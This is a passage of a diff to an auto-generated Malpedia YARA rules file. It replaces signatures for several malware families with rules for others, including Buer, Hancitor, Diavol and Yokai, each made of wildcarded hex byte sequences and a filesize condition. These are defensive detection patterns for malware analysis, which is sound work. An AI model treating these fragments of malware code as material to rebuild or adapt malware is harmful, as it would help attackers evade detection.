-		$sequence_0 = { 41b830000000 488bcf ff15???????? 4885c0 }
-		$sequence_1 = { 85db 0f8477000000 8bb424b0000000 418b10 }
-		$sequence_2 = { 8bb424b0000000 418b10 8bcd 4903d6 0fb602 }
-		$sequence_3 = { 4d03d6 448bcd 85db 0f8477000000 }
-		$sequence_4 = { 488b05???????? 4885c0 7512 ff15???????? 488905???????? 4885c0 }
-		$sequence_5 = { 0f849d000000 41837b1400 0f8492000000 458b4320 458b5324 33ed }
-		$sequence_6 = { bf01000000 8bd7 498bce ffd3 4183bf8c00000000 }
-		$sequence_7 = { c3 85c0 7505 e8???????? b801000000 }
-		$sequence_8 = { 0f84b3000000 458b9f88000000 4d03de 418b5b18 85db 0f849d000000 }
-		$sequence_9 = { 41 ff45fc 42 ff45f8 }
-		$sequence_10 = { 8bc7 ffc8 7416 ffc8 }
-		$sequence_11 = { 81c200000100 8955f8 b804000000 8945fc 81fa80000000 7307 }
-		$sequence_12 = { 4d8bc7 488bd0 488bce ff15???????? }
-		$sequence_13 = { 7405 f60001 7502 33c0 }
-		$sequence_14 = { 48895c2420 4d8bcc 4d8bc7 488bd0 }
-		$sequence_15 = { 33d2 488bce ff15???????? 4c8bf0 4885c0 }
-		$sequence_16 = { 47 41 3bfb 0f825ffeffff }
-		$sequence_17 = { 7505 8d7b02 eb09 6685c0 }
-		$sequence_18 = { 8a17 80fa41 7c0d 80fa5a }
-		$sequence_19 = { ff15???????? 4c8be8 498bce ff15???????? 4d85ed }
-		$sequence_20 = { ebb0 8b5d10 8b750c 8b4d08 47 8b55f4 41 }
-		$sequence_21 = { 7e26 3c5b 750a 5e 894d0c }
-		$sequence_22 = { 488d4b10 488d542450 41b804000000 c6430f68 }
-		$sequence_23 = { 41 7411 43 3c5c }
-		$sequence_24 = { 4d8bcf 33d2 41b800001000 488bce }
-		$sequence_25 = { 7c04 3c39 7ee3 803f2e }
+		$sequence_0 = { 488d55c0 498bcc 488b4038 ff15???????? 410fbaed0e 4183cd20 44896c243c }
+		$sequence_1 = { 8a44246f 4c8b4c2460 488b542460 448a442440 88442420 e8???????? 4889442470 }
+		$sequence_2 = { e8???????? 488b4c2430 4c8d442460 4983c008 488d542458 e8???????? 488b4c2470 }
+		$sequence_3 = { e9???????? 488b8424b8000000 4889842488000000 4c8b442458 48634c2448 31c0 4829c8 }
+		$sequence_4 = { 488b4010 4883e00f 4889442448 48837c244800 0f84ce000000 488b442450 }
+		$sequence_5 = { 0fbf1448 c1ea02 b901000000 84d1 7510 837d4004 7594 }
+		$sequence_6 = { 410f104500 f30f7f4587 48897c2420 440fb74c2440 4c8d4587 488d55b7 488bce }
+		$sequence_7 = { e9???????? c644245f31 8b442460 83e87f 89442458 488b842480000000 483b842488000000 }
+		$sequence_8 = { 4889c1 488b442430 48894c2440 488b4c2450 48894810 66448b44245e 488b542450 }
+		$sequence_9 = { e8???????? e9???????? 488b4c2448 e8???????? 488b4c2430 6689c2 e8???????? }
 
 	condition:
-		7 of them and filesize < 434176
+		7 of them and filesize < 2416640
 }
-rule MALPEDIA_Win_Invisimole_Auto : FILE
+rule MALPEDIA_Win_Buer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff26101a-652d-5609-8231-3c338869a11e"
+		id = "89828c66-91da-5c73-b764-daf37491e283"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.invisimole_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.buer_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "8969781531efc17812b2df34968a188468c9267be73167ccabb12759d11db9c9"
+		logic_hash = "841b3dfa43e2148141873077b2e81e7484da2dab92e27c89fccfead95f717524"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134373,34 +134116,40 @@ rule MALPEDIA_Win_Invisimole_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745f4ffffffff e8???????? 83c414 e9???????? 6a00 6800000008 6a03 }
-		$sequence_1 = { 8b0d???????? 6a04 6a08 51 ffd6 85c0 7491 }
-		$sequence_2 = { 52 56 884d0b e8???????? 8a450c 83c448 6a01 }
-		$sequence_3 = { 746a 53 ff15???????? 8b4df4 51 c645ff01 ffd7 }
-		$sequence_4 = { 8d4da0 51 52 50 ff55c8 85c0 }
-		$sequence_5 = { c645bc0d 668955bd 894dbf 8bde 7409 83c302 66833b2a }
-		$sequence_6 = { 7449 899e8caf0600 3d06010000 7305 e8???????? 899e7caf0600 0fb60f }
-		$sequence_7 = { 52 ffd7 8bd8 895c2414 85db }
-		$sequence_8 = { 895de8 3bde 0f8418010000 8b55ec 8b45f8 53 52 }
-		$sequence_9 = { 8d4602 50 8d8f22020000 51 ff15???????? 33d2 668916 }
+		$sequence_0 = { 8b45dc 03c6 89414c 8b45fc 03c7 894150 8b45ec }
+		$sequence_1 = { 8b55e8 015158 8b55d8 894148 }
+		$sequence_2 = { 8b00 8b4010 8945fc 61 8b45fc }
+		$sequence_3 = { 3bc7 7d0f 8a0c46 880c18 40 }
+		$sequence_4 = { 8b7b50 8b4340 0345f8 8b5b54 }
+		$sequence_5 = { 8b45f4 03c1 8bcb 894144 8b45f0 }
+		$sequence_6 = { 64a130000000 8b400c 8b4014 8b00 8b4010 }
+		$sequence_7 = { 8bc2 eb19 33c0 85d2 7e13 3bc7 7d0f }
+		$sequence_8 = { 01cf 29ce 75a7 e9???????? }
+		$sequence_9 = { 01de 39d6 0f8384000000 8b742414 }
+		$sequence_10 = { 01c7 0fa5da d3e3 8b4c2444 }
+		$sequence_11 = { 0facd313 884e04 8b74247c 8bc6 8b4c2440 }
+		$sequence_12 = { 0fb617 47 89f9 83e23f eb11 }
+		$sequence_13 = { 01fe 68???????? e8???????? a1???????? }
+		$sequence_14 = { 0f82d1000000 83f8fe 0f83d1000000 89d6 }
+		$sequence_15 = { 01de 39c1 0f47c1 89c1 89442420 662e0f1f840000000000 39f9 }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 3031040
 }
-rule MALPEDIA_Win_Redalpha_Auto : FILE
+rule MALPEDIA_Win_Teleport_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "882ba549-5d0f-5044-9824-7266c16fd3e3"
+		id = "8775bf50-843a-53a5-99d2-7f1e8df96bef"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.redalpha_auto.yar#L1-L286"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.teleport"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.teleport_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "6d0bc4e07b8bfd5d42ec13b7e486282bb3ab0b08b56807472d5876342a41efce"
+		logic_hash = "faedc771daee9d9167e2f4449bf3e87076b81c367250e9b9589a86138f934d43"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -134412,52 +134161,32 @@ rule MALPEDIA_Win_Redalpha_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c40c c0e304 0fb6c3 50 68???????? }
-		$sequence_1 = { 68???????? 50 e8???????? 83c40c c0e304 }
-		$sequence_2 = { 8b4314 015330 ffd0 5f }
-		$sequence_3 = { 8b4310 ffd0 8945fc 85c0 }
-		$sequence_4 = { 488da998000000 458be0 4c8be9 488bfa 488d4d20 ff15???????? 488b4508 }
-		$sequence_5 = { 8785c8000000 488b8dd8000000 ff15???????? 488b8de0000000 ff15???????? 48c785d8000000ffffffff }
-		$sequence_6 = { 8b4328 8bcb 52 8b5310 }
-		$sequence_7 = { 89048b 488b4d58 418bc5 48c1e002 480101 }
-		$sequence_8 = { eb0e 48897da0 41bc13000000 48897da8 498b1e }
-		$sequence_9 = { d3eb 442bd9 400fb6d7 f6c210 753d 0f1f840000000000 }
-		$sequence_10 = { 8b430c ffd0 8d50ff 8b45fc 03f2 }
-		$sequence_11 = { e9???????? 488d5908 488d4b20 ff15???????? 488b4308 48894310 ba00040000 }
-		$sequence_12 = { 8b4328 52 8b5310 2b5604 }
-		$sequence_13 = { 8b4324 8975f8 8945dc 8b4328 }
-		$sequence_14 = { 48897db8 448865c0 4533c9 4533c0 33d2 33c9 }
-		$sequence_15 = { e8???????? 48c744243000000000 c744242880000000 c744242002000000 4533c9 4533c0 }
-		$sequence_16 = { 89441f05 8b85c0feffff 89441f09 8b85c4feffff }
-		$sequence_17 = { 6a00 6a00 8d8534ffffff c78514feffff08b94000 898518feffff 8d8514feffff }
-		$sequence_18 = { e8???????? 8b404c 83b8a800000000 7512 8b04bd30744100 807c302900 }
-		$sequence_19 = { 660fd60f 8d7f08 8b048d343b4000 ffe0 }
-		$sequence_20 = { 8bec 81ec1c010000 56 6880000000 8bf1 c745f8ff000000 6a00 }
-		$sequence_21 = { 8d44241c 50 8d442424 50 8d442418 }
-		$sequence_22 = { 8d45f4 8bcf 50 e8???????? 5f 5e 5b }
-		$sequence_23 = { 6a34 68???????? 57 ff15???????? 8bf0 85f6 7517 }
-		$sequence_24 = { ff15???????? 8bf8 85ff 7459 6a00 }
-		$sequence_25 = { c745dc03000000 eb7c c745e040314100 ebbb d9e8 8b4510 dd18 }
-		$sequence_26 = { 8b4710 8d044502000000 50 7219 }
-		$sequence_27 = { 50 f3a5 8d8574ffffff 8bca }
-		$sequence_28 = { c1fa06 8934b8 8bc7 83e03f 6bc830 8b0495581f4000 8b440818 }
-		$sequence_29 = { 7517 57 ff15???????? 5e 5f 8b4dfc }
+		$sequence_0 = { 68???????? 894768 893d???????? ff15???????? }
+		$sequence_1 = { 894824 c6401c01 894dfc 8d85d0feffff b912000000 eb50 }
+		$sequence_2 = { 8b04bde83e4300 ff743018 ff15???????? 85c0 0f95c0 5f 5e }
+		$sequence_3 = { 8b01 6a01 ff10 8b4608 8d7e08 8b08 8900 }
+		$sequence_4 = { 83c404 8b4dc0 0f1003 0f110401 83c010 8945c8 eb06 }
+		$sequence_5 = { 8b45ec c1e810 0fb6c0 330c85a0fe4200 0fb6c2 330c85a0f64200 334fe8 }
+		$sequence_6 = { 3bf0 745a 0f1f440000 68???????? 8bcf e8???????? 837e1c08 }
+		$sequence_7 = { 8b4104 8987a4000000 8b5108 8945f8 8bc2 8997a8000000 8b590c }
+		$sequence_8 = { 894820 894824 c6401c01 8d45c0 c745fc08000000 be00100000 }
+		$sequence_9 = { 0fb6c3 8b5de8 331485a0f64200 3357ac 8bc2 c1e808 0fb6c8 }
 
 	condition:
-		7 of them and filesize < 606208
+		7 of them and filesize < 458752
 }
-rule MALPEDIA_Win_Rusty_Claw_Auto : FILE
+rule MALPEDIA_Win_Lookback_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8fc75c4e-ba70-59d2-9f38-a3aed8cf6b13"
+		id = "85752543-778d-502f-a58c-a2ac64bb54fd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rusty_claw"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rusty_claw_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lookback"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lookback_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "75f315fae698621629456c9a1f27e13b2e79a7325d19df3b6033848f0862def4"
+		logic_hash = "d58209e22f4f6576558a613c24f624b5020028fc2870f726763fd240be9135bc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134471,32 +134200,32 @@ rule MALPEDIA_Win_Rusty_Claw_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 56 83ec08 8b5c241c 8b7c2418 89e0 8d742404 }
-		$sequence_1 = { 5b 5d c3 8b4e10 ba???????? 6a04 e8???????? }
-		$sequence_2 = { 037904 034108 89d1 c1c60d c1ea0a c1c10f 31ce }
-		$sequence_3 = { 8b5664 e8???????? b001 8b8eb0050000 64890d00000000 8d65f4 5e }
-		$sequence_4 = { 29c2 29ca 85d2 7409 4a 803ec0 8d76ff }
-		$sequence_5 = { 0fb7c2 01c8 c3 89d0 354718c32c c1c002 31d0 }
-		$sequence_6 = { 8dbe850ab727 8974245c 89442408 8d81fc6d2c4d 8b4c2458 89442450 8b442430 }
-		$sequence_7 = { 6a0a 5a f7e2 89c3 0f90c2 01cb 0f92c0 }
-		$sequence_8 = { 8b6c241c 8974240c 89de 894c2444 89542438 89442420 894c2424 }
-		$sequence_9 = { 8d043b 99 2bc2 8bf0 d1fe 6a55 ff34f5b8444300 }
+		$sequence_0 = { 8b7c241c 33ed 8b473c 8b443878 03c7 8b5024 }
+		$sequence_1 = { 393d???????? 75af eb24 8b0d???????? }
+		$sequence_2 = { 8b542430 894308 8b442428 83c414 }
+		$sequence_3 = { 8b31 25ff0f0000 03c6 8bf7 }
+		$sequence_4 = { 8b7af8 83c228 03f8 8bc1 c1e902 f3a5 }
+		$sequence_5 = { 668b4b06 3be9 7cd0 5f 5e }
+		$sequence_6 = { 7422 6a00 8d4c2404 6a20 51 6a03 }
+		$sequence_7 = { ff15???????? 8d542400 52 e8???????? 33c0 81c408010000 }
+		$sequence_8 = { 5b 81c410070000 c3 55 8bec 51 53 }
+		$sequence_9 = { 3bef 741b 6800800000 57 }
 
 	condition:
-		7 of them and filesize < 518144
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Crosswalk_Auto : FILE
+rule MALPEDIA_Win_Resident_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1076206e-4e1c-51ff-b49e-1f2c394e3af9"
+		id = "1b67466a-54db-5e85-b74e-0f6af48d989f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crosswalk_auto.yar#L1-L165"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.resident"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.resident_auto.yar#L1-L176"
 		license_url = "N/A"
-		logic_hash = "41379ac5fd7ea514139388720a6ee90edcc7ef23d2f29794443905502b173fda"
+		logic_hash = "c657f6a8f6e1222a8318e6995666aff3bd59abbbd0dacc976a5ca7724d12794b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134510,40 +134239,40 @@ rule MALPEDIA_Win_Crosswalk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4883ec28 4885c9 7402 ffd1 }
-		$sequence_1 = { 8bc2 c1e81f 03d0 69c2890e0000 3bc8 }
-		$sequence_2 = { d3ca 03d0 4183ef01 75ef }
-		$sequence_3 = { 33f6 8d6e20 8bcd e8???????? }
-		$sequence_4 = { 458d7ee0 418bd7 ff15???????? 4821742420 }
-		$sequence_5 = { 41b88d56e68c 418bc0 f7e9 03d1 }
-		$sequence_6 = { 458bc6 33d2 488bc8 e8???????? 4533c9 }
-		$sequence_7 = { 410fbe00 49ffc0 d3ca 03d0 }
-		$sequence_8 = { c1f906 6bd730 8b0c8d808e4100 c644112800 85f6 740c 56 }
-		$sequence_9 = { 58 6bc000 c7803c88410002000000 6a04 58 6bc000 8b0d???????? }
-		$sequence_10 = { 6a00 6a00 57 56 8945f8 ff15???????? }
-		$sequence_11 = { 41 4a c60100 b8???????? c745dc0c234100 8945bc }
-		$sequence_12 = { 8945e8 8945f8 8b4508 56 be???????? c745ec24234100 57 }
-		$sequence_13 = { 7420 6bc618 57 8db880904100 57 ff15???????? }
-		$sequence_14 = { 83e03f 8bca 6bc030 c1f906 03048d808e4100 eb02 }
-		$sequence_15 = { 6bf030 03348d808e4100 837e18ff 740c }
+		$sequence_0 = { 6a00 8d95dcf9ffff 52 6a00 ff15???????? 85c0 }
+		$sequence_1 = { c1e606 03348500b94000 8b45f8 8b00 8906 8b45fc 8a00 }
+		$sequence_2 = { 894c243c 8b4c2460 89442404 89542440 8b54245c }
+		$sequence_3 = { 895c2410 c744240cffffffff 89742408 c744240400000000 }
+		$sequence_4 = { e8???????? 89c6 85c0 0f8427010000 c70424???????? 8d6c243e e8???????? }
+		$sequence_5 = { 8d85d8f9ffff e8???????? 8b95d4f9ffff 8bf0 03d2 8d45dc e8???????? }
+		$sequence_6 = { 750f 33c0 807dfa01 0f94c0 8d740010 eb41 83f803 }
+		$sequence_7 = { 8d55e4 52 ffd6 85c0 75e3 5b }
+		$sequence_8 = { 6689442430 668954242c 8b542422 b830000000 6689442428 66894c242e 0fb74c2420 }
+		$sequence_9 = { c744240800000000 c744240400000000 ff15???????? 83ec20 891c24 e8???????? }
+		$sequence_10 = { 8d34ad00000000 8b04a8 890424 e8???????? 83f825 76da }
+		$sequence_11 = { 8b37 89442418 8d460a 890424 e8???????? 89c3 85c0 }
+		$sequence_12 = { 75e4 b801000000 893c24 8944241c e8???????? }
+		$sequence_13 = { ff15???????? 6a04 8d55fc 52 6a06 }
+		$sequence_14 = { ff15???????? 83ec04 0fb7442446 66895c2450 }
+		$sequence_15 = { eb05 e8???????? 83c404 84c0 0f848e000000 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 125952
 }
-rule MALPEDIA_Win_Cloudeye_Auto : FILE
+rule MALPEDIA_Win_Hancitor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "44608db0-2b3b-55a4-82c4-1c5317afcfea"
+		id = "816fbcdd-d0a4-5ec6-aee7-dc5bd967236b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cloudeye_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hancitor_auto.yar#L1-L255"
 		license_url = "N/A"
-		logic_hash = "54d2e3ccac7509c285f63d14127016b59266a9af9b4d7112de2a7058fc6a0ca1"
+		logic_hash = "92b7f15d306c0b7e353f23f95c271bcb97f7f829d7a8b924160714a7ac9e4284"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -134555,32 +134284,49 @@ rule MALPEDIA_Win_Cloudeye_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 64ff35c0000000 8f4548 c3 60 b055 }
-		$sequence_1 = { c70010000100 80fc8b ffb700500000 39c9 6afe ff5528 }
-		$sequence_2 = { 85da 8b4d18 bafee5190e e8???????? }
-		$sequence_3 = { 7570 206b65 7900 e8???????? 53 }
-		$sequence_4 = { ff50e0 6639d1 61 b8ffffffff }
-		$sequence_5 = { 83f800 0f8598000000 6685c1 8b4d20 81c100410000 c70107000100 51 }
-		$sequence_6 = { 81c29c000000 52 6a07 6aff 38ed 50 e8???????? }
-		$sequence_7 = { 5b 6685da 31c0 83c004 }
-		$sequence_8 = { 8bb714080000 38ef 8b8700080000 01f0 01c8 }
-		$sequence_9 = { 85db 837d7401 750a e8???????? 83f801 7405 }
+		$sequence_0 = { 6a00 6a00 6824040000 6a00 6a00 }
+		$sequence_1 = { 6800010000 6a40 68???????? e8???????? }
+		$sequence_2 = { 750d e8???????? 83c010 a3???????? }
+		$sequence_3 = { 6a20 68???????? 68???????? e8???????? 83c410 }
+		$sequence_4 = { 55 8bec 81ec58010000 6a44 }
+		$sequence_5 = { c745f800000000 c745fc00000000 c745e800000000 6a40 6800300000 8b45f0 50 }
+		$sequence_6 = { 57 8b483c 33f6 03c8 6a40 }
+		$sequence_7 = { 50 c60600 ff15???????? 8b3d???????? }
+		$sequence_8 = { 8b01 2b4234 03450c 8b4de0 8901 8b55f8 83c202 }
+		$sequence_9 = { 8b4dec 8b5150 8955f0 c745f800000000 }
+		$sequence_10 = { 8bec 8b4d08 6a00 6a01 }
+		$sequence_11 = { 8b4508 0fbe08 83f97b 750b 8b5508 83c201 895508 }
+		$sequence_12 = { 8955dc 8b45dc 8b08 894dd8 8b5508 }
+		$sequence_13 = { 83f941 72ed 881d???????? c705????????01000000 }
+		$sequence_14 = { 8b4c1010 51 6b55fc28 8b45f4 8b4d08 034c1014 51 }
+		$sequence_15 = { c745fc00000000 b901000000 85c9 7448 8b5508 }
+		$sequence_16 = { 41 3bc8 72f7 c6043000 40 }
+		$sequence_17 = { 6a01 51 8b413c 8b440828 03c1 }
+		$sequence_18 = { 83c410 83f801 750e 57 ff15???????? 8bd8 }
+		$sequence_19 = { f9 a6 c3 4b fd 008d4556f400 08640f08 }
+		$sequence_20 = { 40 8945d0 8b45c0 83c008 8945c0 8b45b8 }
+		$sequence_21 = { 8b45a0 05c8d45566 7440 c745880a000000 eb07 8b4588 }
+		$sequence_22 = { 55 08709e 891f 3e50 }
+		$sequence_23 = { 2345e4 8945d8 c645f300 c645fc65 }
+		$sequence_24 = { a1???????? 8945b4 a1???????? 83c044 a3???????? }
+		$sequence_25 = { 8b45b4 83e803 8945b4 eb22 }
+		$sequence_26 = { 0305???????? a3???????? a1???????? 0faf45bc a3???????? ebc5 8365d400 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Webbytea_Auto : FILE
+rule MALPEDIA_Win_Yokai_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "af3cfaf5-47ae-5df3-b1d3-9a9fcbf06c59"
+		id = "b04b80f2-53b4-5c24-9a48-b847d3a545be"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webbytea"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webbytea_auto.yar#L1-L110"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yokai"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yokai_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "f1288f1b53f639ade5d87a2ce49a70d5b29a0fbdd563d1f0066de9197507a949"
+		logic_hash = "caca021b644694d243a390b5d4a331d52bc15ed81e965c2661870a1fa9d1ad5a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134594,32 +134340,32 @@ rule MALPEDIA_Win_Webbytea_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8901 488d542430 488b4c2420 ff15???????? }
-		$sequence_1 = { 8901 488d542430 488b4c2420 ff15???????? 85c0 }
-		$sequence_2 = { ff15???????? 85c0 7422 41b904000000 }
-		$sequence_3 = { ff15???????? 85c0 7444 41b904000000 }
-		$sequence_4 = { c68424f000000043 c68424f100000072 c68424f200000065 c68424f300000061 c68424f400000074 }
-		$sequence_5 = { ffc0 488b8c2488020000 8901 488d542430 488b4c2420 ff15???????? 85c0 }
-		$sequence_6 = { 4803c8 488bc1 48c744243000000000 c744242800000000 }
-		$sequence_7 = { c68424f100000072 c68424f200000065 c68424f300000061 c68424f400000074 c68424f500000065 }
-		$sequence_8 = { 8b00 ffc0 488b8c2488020000 8901 }
-		$sequence_9 = { c68424f100000072 c68424f200000065 c68424f300000061 c68424f400000074 }
+		$sequence_0 = { 83780400 7f5e 8b4d14 83790400 7514 8b5514 8b4208 }
+		$sequence_1 = { 8945fc 837dfc00 751e 8b55fc 8955b4 8d4df4 e8???????? }
+		$sequence_2 = { 8b4d24 51 6a00 6a7e 68???????? 68???????? 68???????? }
+		$sequence_3 = { c645ac4c c645ad6f c645ae61 c645af64 c645b04c c645b169 c645b262 }
+		$sequence_4 = { e8???????? 6a00 6a00 6a00 8d85a0fdffff 50 6a00 }
+		$sequence_5 = { 0345d4 a3???????? 8b4dec 8b15???????? 2b5114 8915???????? 8b450c }
+		$sequence_6 = { 8945c0 8b4dc0 898d70ffffff 8d9570ffffff 52 8d45d0 50 }
+		$sequence_7 = { 8a11 8855ff 8b45f8 8b480c 83c101 8b55f8 894a0c }
+		$sequence_8 = { 8d0c50 894df8 e8???????? c5fe7f4580 8b530c 2b55ec }
+		$sequence_9 = { ff15???????? 3bf4 e8???????? 50 a1???????? 83c004 50 }
 
 	condition:
-		7 of them and filesize < 552960
+		7 of them and filesize < 2066432
 }
-rule MALPEDIA_Win_Reactorbot_Auto : FILE
+rule MALPEDIA_Win_Diavol_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1f9dea8e-61fb-5c9c-9443-ee6383884e21"
+		id = "bc879f2f-8309-5494-be6c-2895dcf861fb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.reactorbot_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diavol"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.diavol_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "701fb8c7491a0d723c5845d4d6cce6ffa47155dd0df2cecad8bd6a0e42ab031b"
+		logic_hash = "46d9c76f218871fb04ea7d4fbbcd65e671198d70df944c765e3f433c4820310f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134633,38 +134379,32 @@ rule MALPEDIA_Win_Reactorbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4804 894dfc 8b55fc a1???????? }
-		$sequence_1 = { c745e400000000 a1???????? 8945e0 8b4d08 }
-		$sequence_2 = { 50 ff15???????? 8b55f4 52 ff15???????? 8b45ec 8be5 }
-		$sequence_3 = { ff15???????? 8945f8 837df800 7449 8b55fc 52 }
-		$sequence_4 = { 8d8590fdffff 50 ff15???????? 8d8d90fdffff 51 }
-		$sequence_5 = { 8d9580f9ffff 52 ff15???????? 8945ec 837decff }
-		$sequence_6 = { a1???????? 8982b8000000 83c8ff 8be5 }
-		$sequence_7 = { 8b4508 50 6804010000 8d8d78f7ffff 51 e8???????? 8d9578f7ffff }
-		$sequence_8 = { 7402 eb0c c705????????b80b0000 eb0a c705????????e8030000 }
-		$sequence_9 = { ff15???????? e8???????? 833d????????00 7509 833d????????00 }
-		$sequence_10 = { 83c005 99 b905000000 f7f9 }
-		$sequence_11 = { 69c0b13a0200 99 83e203 03c2 }
-		$sequence_12 = { 6bc005 83e803 99 b999000000 f7f9 }
-		$sequence_13 = { 83e101 f7d9 81e12083b8ed 33c1 }
-		$sequence_14 = { 837c246000 0f8562010000 c744245400000000 c744247400100000 }
-		$sequence_15 = { 48837c245000 0f8417040000 4c8d0da2b30000 41b804000000 488d15ed7e0000 488b4c2450 }
+		$sequence_0 = { 8be5 5d c3 8d85c8fbffff 50 56 c785c8fbffff2c020000 }
+		$sequence_1 = { 3bc3 72d8 8d8da0fdffff 68???????? 51 68???????? 8bd1 }
+		$sequence_2 = { 83f8ff 752c 6a02 53 ff15???????? 53 ff15???????? }
+		$sequence_3 = { 8d740004 56 e8???????? 83c404 56 8d95f8fdffff }
+		$sequence_4 = { 0f84d4000000 6800040000 8d95f8f9ffff 6a00 52 }
+		$sequence_5 = { 668b08 83c002 6685c9 75f5 8dbdf4efffff 2bc2 83c7fe }
+		$sequence_6 = { 56 ff15???????? 57 e8???????? a1???????? 8b4dd0 8d1448 }
+		$sequence_7 = { 8b8d38c2ffff 8d953cc2ffff 52 8d8540c2ffff 6a00 50 }
+		$sequence_8 = { 8be5 5d c3 8d8405c0fbffff }
+		$sequence_9 = { 8be5 5d c3 b902000000 6a50 }
 
 	condition:
-		7 of them and filesize < 1032192
+		7 of them and filesize < 191488
 }
-rule MALPEDIA_Win_Phandoor_Auto : FILE
+rule MALPEDIA_Win_Faketc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
